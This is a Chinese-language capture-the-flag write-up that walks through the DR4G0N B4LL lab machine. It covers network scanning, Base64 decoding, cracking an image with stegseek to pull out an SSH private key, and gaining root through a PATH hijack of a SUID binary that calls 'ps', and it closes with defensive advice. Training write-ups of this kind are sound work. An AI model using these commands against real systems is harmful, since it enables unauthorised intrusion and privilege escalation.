DR4G0N B4LL靶场渗透复现教学文档<\/h1>

0x00 环境准备<\/h2>

攻击机配置<\/h3>

操作系统：Kali Linux<\/li>

IP地址：192.168.71.129<\/li> <\/ul>

靶机信息<\/h3>

网络环境：与Kali同网段<\/li>

初始IP未知，需通过扫描发现<\/li> <\/ul>

0x01 信息收集阶段<\/h2>

1. 网络扫描<\/h3>

使用ARP扫描发现靶机IP：<\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>
发现目标IP：192.168.71.130<\/li>
<\/ul>
2. 端口扫描<\/h3>
使用nmap进行端口扫描：<\/p>
nmap -sV 192.168.71.130
<\/span><\/span><\/code><\/pre>
开放端口：

22\/tcp - SSH服务<\/li>
80\/tcp - HTTP服务<\/li>
<\/ul>
<\/li>
<\/ul>
0x02 Web渗透阶段<\/h2>
1. 初步网站分析<\/h3>

访问http:\/\/192.168.71.130<\/li>
发现七龙珠介绍页面，提示为CTF环境<\/li>
<\/ul>
2. 源代码分析<\/h3>
查看网页源代码发现：<\/p>

三层Base64编码的字符串<\/li>
解码步骤：
echo "初始Base64字符串"<\/span> | base64 -d | base64 -d | base64 -d
<\/span><\/span><\/code><\/pre><\/li>
最终解码结果："DRAGON BALL"<\/li>
<\/ul>
3. Robots.txt检查<\/h3>
访问http:\/\/192.168.71.130\/robots.txt<\/p>

发现另一Base64编码信息<\/li>
解码后内容："you find the hidden dir"<\/li>
<\/ul>
4. 目录发现<\/h3>

访问http:\/\/192.168.71.130\/DRAGON_BALL\/<\/li>
发现内容：

vulnhub\/目录<\/li>
secret.txt文件<\/li>
<\/ul>
<\/li>
<\/ul>
secret.txt分析<\/h4>

包含多个疑似用户名和密码的组合<\/li>
测试发现均为404无效路径<\/li>
<\/ul>
vulnhub目录内容<\/h4>

aj.jpg图片文件<\/li>
login.html页面<\/li>
<\/ul>
5. 图片隐写分析<\/h3>
使用stegseek工具分析aj.jpg：<\/p>
wget http:\/\/192.168.71.130\/DRAGON_BALL\/vulnhub\/aj.jpg
<\/span><\/span>stegseek aj.jpg \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>
注意：需先解压rockyou.txt.gz<\/li>
提取出aj.jpg.out文件，内容为SSH私钥<\/li>
<\/ul>
6. SSH私钥处理<\/h3>

检查私钥权限：<\/li>
<\/ol>
chmod 600<\/span> aj.jpg.out
<\/span><\/span><\/code><\/pre>
尝试SSH连接：<\/li>
<\/ol>
ssh -i aj.jpg.out root@192.168.71.130 # 需要密码<\/span>
<\/span><\/span>ssh -i aj.jpg.out xmen@192.168.71.130 # 成功登录<\/span>
<\/span><\/span><\/code><\/pre>0x03 权限提升阶段<\/h2>
1. 初始信息收集<\/h3>
登录xmen用户后：<\/p>

发现文件：

local.txt（假flag）<\/li>
script\/目录<\/li>
<\/ul>
<\/li>
<\/ul>
script目录内容<\/h4>

demo.c：C语言源代码<\/li>
shell：可执行文件<\/li>
<\/ul>
2. 代码分析<\/h3>
demo.c内容分析：<\/p>
\/\/ 设置进程UID和GID为root
<\/span><\/span><\/span><\/span>setuid(0<\/span>);
<\/span><\/span>setgid(0<\/span>);
<\/span><\/span>\/\/ 调用ps命令查看进程状态
<\/span><\/span><\/span><\/span>system("ps"<\/span>);
<\/span><\/span><\/code><\/pre>3. 环境变量劫持提权<\/h3>

创建恶意ps文件：<\/li>
<\/ol>
echo "\/bin\/bash"<\/span> > ps
<\/span><\/span>chmod +x ps
<\/span><\/span><\/code><\/pre>
修改PATH环境变量：<\/li>
<\/ol>
export PATH=<\/span>\/home\/xmen:$PATH
<\/span><\/span><\/code><\/pre>
执行漏洞程序：<\/li>
<\/ol>
\/script\/shell
<\/span><\/span><\/code><\/pre>
成功获取root shell<\/li>
<\/ul>
4. 获取flag<\/h3>
进入root家目录查看flag：<\/p>
cd \/root
<\/span><\/span>cat flag.txt
<\/span><\/span><\/code><\/pre>0x04 技术总结<\/h2>
关键知识点<\/h3>


信息收集<\/strong>：<\/p>

ARP扫描发现同网段主机<\/li>
端口扫描确定服务<\/li>
网页源代码和robots.txt检查<\/li>
<\/ul>
<\/li>

Web渗透<\/strong>：<\/p>

Base64多层解码技巧<\/li>
目录爆破与敏感文件发现<\/li>
图片隐写分析技术<\/li>
<\/ul>
<\/li>

权限提升<\/strong>：<\/p>

SSH私钥利用<\/li>
环境变量PATH劫持<\/li>
SUID程序滥用<\/li>
<\/ul>
<\/li>

工具使用<\/strong>：<\/p>

arp-scan<\/li>
nmap<\/li>
stegseek<\/li>
chmod处理私钥权限<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h3>

避免在网页中遗留敏感信息<\/li>
严格控制文件权限，特别是私钥文件<\/li>
谨慎设置SUID程序<\/li>
在调用系统命令时使用绝对路径<\/li>
定期检查服务器上的异常文件和目录<\/li>
<\/ol>
参考资源<\/h2>

CSDN博客参考<\/a><\/li>
Stegseek工具使用文档<\/li>
Linux权限提升技术手册<\/li>
<\/ul>

DR4G0N B4LL靶场渗透复现教学文档<\/h1>

0x00 环境准备<\/h2>

0x01 信息收集阶段<\/h2>

0x02 Web渗透阶段<\/h2>

0x03 权限提升阶段<\/h2>

0x04 技术总结<\/h2>

参考资源<\/h2> CSDN博客参考<\/a><\/li> Stegseek工具使用文档<\/li> Linux权限提升技术手册<\/li> <\/ul>

参考资源<\/h2>

CSDN博客参考<\/a><\/li>
Stegseek工具使用文档<\/li>
Linux权限提升技术手册<\/li> <\/ul>